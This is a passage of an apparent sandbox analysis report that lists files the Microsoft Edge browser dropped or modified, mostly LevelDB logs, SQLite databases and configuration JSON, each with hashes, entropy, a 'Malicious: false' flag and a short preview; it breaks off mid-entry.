SSDEEP:	6:HGJ9u3R1N723oH+Tcwtp3hBtB2KLlVGJ9u9sjL+q2PN723oH+Tcwtp3hBWsIFUv:DaYebp3dFLzsOvVaYebp3eFUv
MD5:	A5D331C1C11D3D6E01120F78B51495BE
SHA1:	EE1833CB126AD7E363D775031A3414E603DC95BF
SHA-256:	3BB568E9E007AFA359DE0A69D26C0F659944D82CC4CA5AC562AC4F882DF173CF
SHA-512:	24EA7CC4BC1E66984F0EEFAFFD314B3BA0BF6692586D9F0C0BF6580A3C40D6F9BD11440BA3DD0314A5441C7D8AC5F3A08902F7768EEE56B316B89C4FC7E9DC76
Malicious:	false
Preview:	2024/11/23-01:09:36.490 2198 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/23-01:09:36.880 2198 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222855832103895
Encrypted:	false
SSDEEP:	24576:IbPMZpVzfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVzfx2mjF
MD5:	A8859D94ADE66CAB3FBD05532FBFCD54
SHA1:	A49E9FE37A816E2FAA4B936B3C2D37C6F0263D61
SHA-256:	24E44EAA3F037FA870214A5731B81F3165CA2B76731AB4F81E2177C728621752
SHA-512:	94EB6A51D9976672507BB99EDB90DB7013899A1C8911595901CFA0EC5D7D6FBE5C337BE718F29C4056AE3CEFA5BAA443E1BAE8B75848727750107373F80D1C84
Malicious:	false
Preview:	...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4...13340960289901340.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	340
Entropy (8bit):	5.120876002867613
Encrypted:	false
SSDEEP:	6:HGJ9uJQ+q2PN723oH+Tcwt9Eh1tIFUt8YGJ9uYgZmw+YGJ9u79SQVkwON723oH+8:xvVaYeb9Eh16FUt80/+gF5OaYeb9Eh1H
MD5:	AB9392E8D4A082FA5D3ABBF912CCC731
SHA1:	22512B4962448C42468FA46F7E9AAE975454E99D
SHA-256:	98AE64C53BC46C77C57E931959D136489B131221816A9A0AED547DC9E0332D25
SHA-512:	E5114D85797EEF8B5D18236C8302D69E3AF4EC21128F06A481957D150A2358BCF854635CA931EC8F01ECCDF2C936D24C09F7D645371D9A75DEC90DF2EF16F261
Malicious:	false
Preview:	2024/11/23-01:09:36.802 22b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/23-01:09:36.814 22b8 Recovering log #3.2024/11/23-01:09:36.821 22b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	340
Entropy (8bit):	5.120876002867613
Encrypted:	false
SSDEEP:	6:HGJ9uJQ+q2PN723oH+Tcwt9Eh1tIFUt8YGJ9uYgZmw+YGJ9u79SQVkwON723oH+8:xvVaYeb9Eh16FUt80/+gF5OaYeb9Eh1H
MD5:	AB9392E8D4A082FA5D3ABBF912CCC731
SHA1:	22512B4962448C42468FA46F7E9AAE975454E99D
SHA-256:	98AE64C53BC46C77C57E931959D136489B131221816A9A0AED547DC9E0332D25
SHA-512:	E5114D85797EEF8B5D18236C8302D69E3AF4EC21128F06A481957D150A2358BCF854635CA931EC8F01ECCDF2C936D24C09F7D645371D9A75DEC90DF2EF16F261
Malicious:	false
Preview:	2024/11/23-01:09:36.802 22b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/23-01:09:36.814 22b8 Recovering log #3.2024/11/23-01:09:36.821 22b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46260980881160496
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBueG:TouQq3qh7z3bY2LNW9WMcUvBueG
MD5:	105F15897F92206ED2B35401ACB019BE
SHA1:	0530F841517E72497E7FE1679B4362B78A761C65
SHA-256:	D9CA5EF2E7665FAB567551676E38077D610BDA79B6A2D41D534396B75510C7EE
SHA-512:	9338B091D9720C1FC3A060121749C5D10F1EBD1D207867628E01B76D3CFEA65744E40735A2B9F99FD1E11DB0087B57AFE2644FFE64864695C4A49EBA655B0171
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.162393496604406
Encrypted:	false
SSDEEP:	6:HGJ9uTmTAt+q2PN723oH+TcwtnG2tMsIFUt8YGJ9uTmtZmw+YGJ9uTmxVkwON725:pgpvVaYebn9GFUt8M+/+My5OaYebn95J
MD5:	DA5C759F172805C8A8610295D8EA9282
SHA1:	643CD6057443051D97AAB4EDA8639322F5FCE171
SHA-256:	28148C237472000E9E8C5779E5701440C89941D5238DB0F4E8226C4160A363BD
SHA-512:	BB7511F2CA7BE3A76D617B3CF96F59C948E7BCF01DE091C24C9BE052491269F7805AAC1A8357173EC1825CB8749467C21D286254F5EA87CDFC47DA53B2040569
Malicious:	false
Preview:	2024/11/23-01:09:31.703 1de8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/23-01:09:31.704 1de8 Recovering log #3.2024/11/23-01:09:31.704 1de8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.162393496604406
Encrypted:	false
SSDEEP:	6:HGJ9uTmTAt+q2PN723oH+TcwtnG2tMsIFUt8YGJ9uTmtZmw+YGJ9uTmxVkwON725:pgpvVaYebn9GFUt8M+/+My5OaYebn95J
MD5:	DA5C759F172805C8A8610295D8EA9282
SHA1:	643CD6057443051D97AAB4EDA8639322F5FCE171
SHA-256:	28148C237472000E9E8C5779E5701440C89941D5238DB0F4E8226C4160A363BD
SHA-512:	BB7511F2CA7BE3A76D617B3CF96F59C948E7BCF01DE091C24C9BE052491269F7805AAC1A8357173EC1825CB8749467C21D286254F5EA87CDFC47DA53B2040569
Malicious:	false
Preview:	2024/11/23-01:09:31.703 1de8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/23-01:09:31.704 1de8 Recovering log #3.2024/11/23-01:09:31.704 1de8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6124356936083413
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mW/WY9MAldWR:TLapR+DDNzWjJ0npnyXKUO8+jmpDmL
MD5:	2CF06DADF5FDBEED214C94ADA56DA8A4
SHA1:	5121518C7B316F4C4EA8B527B6DDE8D63A01EFFA
SHA-256:	85288CEBC07E01FEC6679E0C2D2E2FF6163C298014FEB99DB7218FB29162C106
SHA-512:	D22D702D004B232D92C9D8D8F2B9C763E0621B926CD33F17E9EB0C453D2BFFC6CB9097A2FFD065C349FEC212AFE10F8E5E84627B4F3865AEA3647F876B12C6BE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354135222747979
Encrypted:	false
SSDEEP:	6144:YA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:YFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	27AE030DC9738833AAEF4F6E8729D47A
SHA1:	E5036CEDDC39C6975B2B241DF558271DCDAC8D23
SHA-256:	F10D4CCEEAEAC14B47E2AF5876EA27554FB006087B9C0934F9E9F6E8FD20C186
SHA-512:	F18A991817CE8DB452CC535497DAED937F221E9F6E026BD937E5DE84E422CF22431D0C45289EB14F59E82AF13A92F1971793A5F164DF148D5C4D7A1EDAE1C649
Malicious:	false
Preview:	...m.................DB_VERSION.1.._.q...............&QUERY_TIMESTAMP:domains_config_gz2...13376815779487367..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.159599229493355
Encrypted:	false
SSDEEP:	6:HGJ9u7q1N723oH+Tcwtk2WwnvB2KLlVGJ9uJd/Q+q2PN723oH+Tcwtk2WwnvIFUv:YaYebkxwnvFLTvVaYebkxwnQFUv
MD5:	72358F7F1F2F4C94E1674EE19D509B9E
SHA1:	5043EBCFA54294A073B4468D44910C0A8AEFE892
SHA-256:	2E395E7457DA62B3F32926F5E63083DAFDD2DDED231BC51912B78AA9ED2951E7
SHA-512:	0C99BE2B3A0254C34CCDEA0F84854270CD45E137BC108ACD2EA0AAD6650427B0174A757DA5B41E41601D3F927A11D9159357BF4B0FE4D0A22F943F0457C3BE68
Malicious:	false
Preview:	2024/11/23-01:09:36.836 22c8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/23-01:09:36.948 22c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324607640147518
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RV:C1gAg1zfvt
MD5:	A8C6C545882EBA132444647104C6F704
SHA1:	EF92C54A6A26AEEF4935C4FC70CCD54D7E8D62A6
SHA-256:	8DFB12A98D545B2251377F3D60E6F343C6BB7640D9724053DA1448128810454D
SHA-512:	435205D656CAD5D11A7FEF1ADBACEC5D5E5E4784D876BC56CE4B3E25F27217FA2B3482EA2596F03D182D688401AF8F287507B1499792B620B2B4C80169035B39
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.11986174745828
Encrypted:	false
SSDEEP:	6:HGJ9uT0z+q2PN723oH+Tcwt8aPrqIFUt8YGJ9uTehFmWZmw+YGJ9uTehFNVkwONf:p0z+vVaYebL3FUt8MuFmW/+MuFNV5OaE
MD5:	8D2D43E42FB842BDA8829724E8F9CF40
SHA1:	F8240F27C172BF20038C5E3B54A20CEFFBC5139C
SHA-256:	75019F8351ED83E1676098656F3F65E4F0772A2042681E6C003A72B0E4DEF040
SHA-512:	BFB2B95E98BC08739010579F48425C65132746E5818269AB8CE2D21157DD2ABF6327F38A9B9F61A385A39D04EEF971FA5898BBFFCCBE67C95C780816262E68E9
Malicious:	false
Preview:	2024/11/23-01:09:31.606 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/23-01:09:31.608 1dec Recovering log #3.2024/11/23-01:09:31.608 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.11986174745828
Encrypted:	false
SSDEEP:	6:HGJ9uT0z+q2PN723oH+Tcwt8aPrqIFUt8YGJ9uTehFmWZmw+YGJ9uTehFNVkwONf:p0z+vVaYebL3FUt8MuFmW/+MuFNV5OaE
MD5:	8D2D43E42FB842BDA8829724E8F9CF40
SHA1:	F8240F27C172BF20038C5E3B54A20CEFFBC5139C
SHA-256:	75019F8351ED83E1676098656F3F65E4F0772A2042681E6C003A72B0E4DEF040
SHA-512:	BFB2B95E98BC08739010579F48425C65132746E5818269AB8CE2D21157DD2ABF6327F38A9B9F61A385A39D04EEF971FA5898BBFFCCBE67C95C780816262E68E9
Malicious:	false
Preview:	2024/11/23-01:09:31.606 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/23-01:09:31.608 1dec Recovering log #3.2024/11/23-01:09:31.608 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.111438128406897
Encrypted:	false
SSDEEP:	6:HGJ9uT5+q2PN723oH+Tcwt865IFUt8YGJ9uTcWZmw+YGJ9uT7VkwON723oH+Tcwx:p5+vVaYeb/WFUt8McW/+M7V5OaYeb/+e
MD5:	1D789F1498074CED9C2F59852C6A8206
SHA1:	4EA660470476480F0C194173E6C408EBA1F11DE0
SHA-256:	CD0FF39A725005C56F7EFE2105F7EBE295654D1D6022348E7F71AB0674ED8E7F
SHA-512:	F0F1F0E824965AF875B7143177EDBE63A458CBFC3EA49D9D30946250AB545D82A42D5319821EDA7BBD3509245D514CF3889D81165F19A57B3AD6FE57A3AB8BCC
Malicious:	false
Preview:	2024/11/23-01:09:31.612 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/23-01:09:31.614 1dec Recovering log #3.2024/11/23-01:09:31.614 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.111438128406897
Encrypted:	false
SSDEEP:	6:HGJ9uT5+q2PN723oH+Tcwt865IFUt8YGJ9uTcWZmw+YGJ9uT7VkwON723oH+Tcwx:p5+vVaYeb/WFUt8McW/+M7V5OaYeb/+e
MD5:	1D789F1498074CED9C2F59852C6A8206
SHA1:	4EA660470476480F0C194173E6C408EBA1F11DE0
SHA-256:	CD0FF39A725005C56F7EFE2105F7EBE295654D1D6022348E7F71AB0674ED8E7F
SHA-512:	F0F1F0E824965AF875B7143177EDBE63A458CBFC3EA49D9D30946250AB545D82A42D5319821EDA7BBD3509245D514CF3889D81165F19A57B3AD6FE57A3AB8BCC
Malicious:	false
Preview:	2024/11/23-01:09:31.612 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/23-01:09:31.614 1dec Recovering log #3.2024/11/23-01:09:31.614 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.1282187188038275
Encrypted:	false
